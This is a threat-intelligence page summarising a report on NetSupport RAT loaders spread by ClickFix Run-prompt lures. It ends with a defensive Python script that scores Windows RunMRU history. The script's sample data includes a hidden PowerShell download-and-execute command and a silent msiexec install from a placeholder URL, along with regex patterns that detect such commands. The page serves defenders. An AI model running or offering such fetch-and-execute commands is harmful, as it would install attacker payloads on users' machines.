Unpacking NetSupport RAT Loaders Delivered via ClickFix
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY:
eSentire's Threat Response Unit observed multiple threat groups utilizing NetSupport Manager for malicious purposes throughout 2025. These groups have shifted from Fake Updates to ClickFix as their primary delivery method. The attack methodology involves social engineering victims to execute malicious commands in the Windows Run Prompt, leading to NetSupport extraction and execution. Three distinct threat groups were identified, each using different loaders and infrastructure. The groups are designated by their licensee names: EVALUSION, FSHGDREE32/SGI, and XMLCTL. The analysis includes details on the PowerShell/JSON-based loader, MSI-based loader, and NetSupport PCAP analysis. An unpacking utility and YARA rule are provided to aid researchers in detecting and analyzing NetSupport variants.
OPENCTI LABELS:
netsupport rat,clickfix,remote administration tools
AI COMMENTARY:
1. Introduction to NetSupport RAT and ClickFix Delivery Methods
Throughout 2025, eSentire's Threat Response Unit (TRU) observed a significant uptick in the use of NetSupport Manager as a foothold tool by multiple threat actors. Sold as a legitimate remote administration tool (RAT), NetSupport Manager has long been abused to maintain covert access to compromised environments. What sets this recent wave of attacks apart is the shift in delivery technique from generic fake software updates to a more targeted, socially engineered campaign dubbed "ClickFix." The eSentire blog post unpacks how attackers leveraged ClickFix to deploy custom NetSupport loaders, profiles three distinct threat clusters, examines multiple loader types and PCAP data, and provides defensive countermeasures, including an unpacking utility and a YARA rule.

2. Evolution from Fake Updates to ClickFix
Early iterations of NetSupport RAT delivery relied on deceptive download prompts masquerading as security patches or software upgrades. By mid-2025, threat groups had grown more sophisticated, embedding malicious payloads behind a deceptive ClickFix interface. Victims receive a prompt urging them to type a system command into the Windows Run prompt under the guise of troubleshooting connectivity issues. Once executed, the command silently fetches and extracts a customized NetSupport Manager package. This refined social engineering ruse significantly improved loader execution rates and reduced detection by traditional security controls.

3. Attack Methodology Breakdown
The ClickFix strategy revolves around human interaction and trust exploitation. Attackers first entice users via phishing emails or malicious advertisements claiming to resolve network or software problems. If the user complies, the command entered in the Run prompt reaches out to a remote server hosting the loader. This loader then unpacks and launches the NetSupport RAT binary, establishing persistent remote access. Throughout the process, network communications mimic legitimate remote administration traffic, complicating anomaly detection and attribution efforts.

4. Profiling the Three Distinct Threat Groups
The TRU's analysis identified three licensee-named clusters behind these campaigns: EVALUSION, FSHGDREE32/SGI, and XMLCTL. EVALUSION primarily leveraged a PowerShell/JSON-based loader, hosting configurations on dynamic web resources. FSHGDREE32/SGI preferred an MSI-based loader, bundling NetSupport within digitally signed installer packages. XMLCTL resorted to custom loader variants with unique obfuscation techniques and dedicated command-and-control (C2) servers. Each group's infrastructure and operational tempo varied, yet they all converged on the NetSupport RAT framework to facilitate espionage and data exfiltration.

5. Loader Characteristics and PCAP Analysis
The PowerShell/JSON loader employed by EVALUSION pulled a JSON payload containing encoded NetSupport binaries and execution parameters. MSI loaders from FSHGDREE32/SGI exploited Windows Installer's native capabilities to evade manual inspection. XMLCTL's loader introduced multi-stage unpacking routines and encrypted traffic channels. PCAP captures of NetSupport Manager sessions revealed standard protocol handshakes, encrypted command exchanges, and file transfer sequences. Researchers dissected these captures to identify consistent network fingerprints, which can be leveraged to flag anomalous remote administration sessions.

6. Unpacking Utility and YARA Rule for Detection
To streamline reverse engineering efforts, the TRU developed a standalone unpacking utility capable of extracting NetSupport binaries from both PowerShell- and MSI-based loaders. This tool automates deobfuscation and reconstructs the original executable artifacts. Accompanying the utility is a YARA rule designed to detect loader artifacts based on unique string patterns, configuration markers, and binary signatures. Security teams can integrate these resources into analysis workflows to accelerate threat hunting and incident response against NetSupport-based intrusions.

7. Recommendations and Defensive Measures
Defenders should enforce multi-factor authentication for remote administration tools and monitor for anomalous Windows Run prompt invocations. Email security gateways must be tuned to flag ClickFix-style social engineering lures. Network defenders can leverage the identified PCAP indicators and the provided YARA rule to detect malicious NetSupport sessions. Finally, keeping endpoint detection and response (EDR) solutions updated with the unpacking utility's signatures will ensure rapid identification and containment of NetSupport RAT variants. By adopting these measures, organizations can mitigate the evolving threat posed by sophisticated RAT loaders delivered via ClickFix.
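The recommendation above to monitor Windows Run prompt invocations can be turned into a host-level triage check: the Run dialog keeps the commands a user typed in the RunMRU registry key, so a responder can score those entries for the interpreter-plus-remote-fetch pattern that ClickFix lures rely on. The script below is an added example, not code from the eSentire report or the OpenCTI page; the registry snapshot is constructed, and the scoring heuristics and threshold are assumptions, not indicators from the report.

```python
"""Triage Windows Run-prompt history (RunMRU) for ClickFix-style command lines.

Added example, not part of the eSentire report or this OpenCTI page.
The Run dialog records what the user typed under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
one REG_SZ value per entry (a, b, c, ...), each ending in "\\1", plus an
"MRUList" value giving most-recent-first order. On a live host the dict
below would come from winreg; here it is a constructed sample.
"""
import re

# Constructed RunMRU snapshot (value name -> data). Hosts and URLs are fake.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "msiexec /i http://example.invalid/update.msi /qn\\1",
    "c": 'powershell -w hidden -c "iwr -useb http://example.invalid/cfg.json|iex"\\1',
}

# Assumed heuristics: an interpreter or installer launched from the Run box,
# combined with a remote fetch and/or a switch that hides the window.
LOLBIN = re.compile(r"\b(powershell|pwsh|mshta|msiexec|cmd|wscript|cscript|curl|certutil)\b", re.I)
FETCH = re.compile(r"(https?://|\biwr\b|\biex\b|invoke-(webrequest|expression)|downloadstring|-e(nc|ncodedcommand)?\b)", re.I)
HIDDEN = re.compile(r"(-w(indowstyle)?\s+hidden|/qn\b|-nop\b|-noprofile\b)", re.I)


def parse_runmru(values):
    """Return typed commands in MRU order (most recent first), '\\1' suffix stripped."""
    out = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue
        out.append(data[:-2] if data.endswith("\\1") else data)
    return out


def score_command(cmd):
    """Score one Run entry: 1 for a LOLBin, 2 for a fetch/decode token, 1 for window hiding."""
    score = 0
    if LOLBIN.search(cmd):
        score += 1
    if FETCH.search(cmd):
        score += 2
    if HIDDEN.search(cmd):
        score += 1
    return score


def triage(values, threshold=2):
    """Return (command, score) pairs at or above the assumed review threshold."""
    return [(cmd, s) for cmd in parse_runmru(values) if (s := score_command(cmd)) >= threshold]


if __name__ == "__main__":
    for cmd, s in triage(SAMPLE_RUNMRU):
        print(f"[score {s}] {cmd}")
```

A benign entry such as `notepad` scores 0, while both loader-style entries (the MSI install from a URL and the hidden PowerShell download-and-execute) score 4 and are surfaced for review.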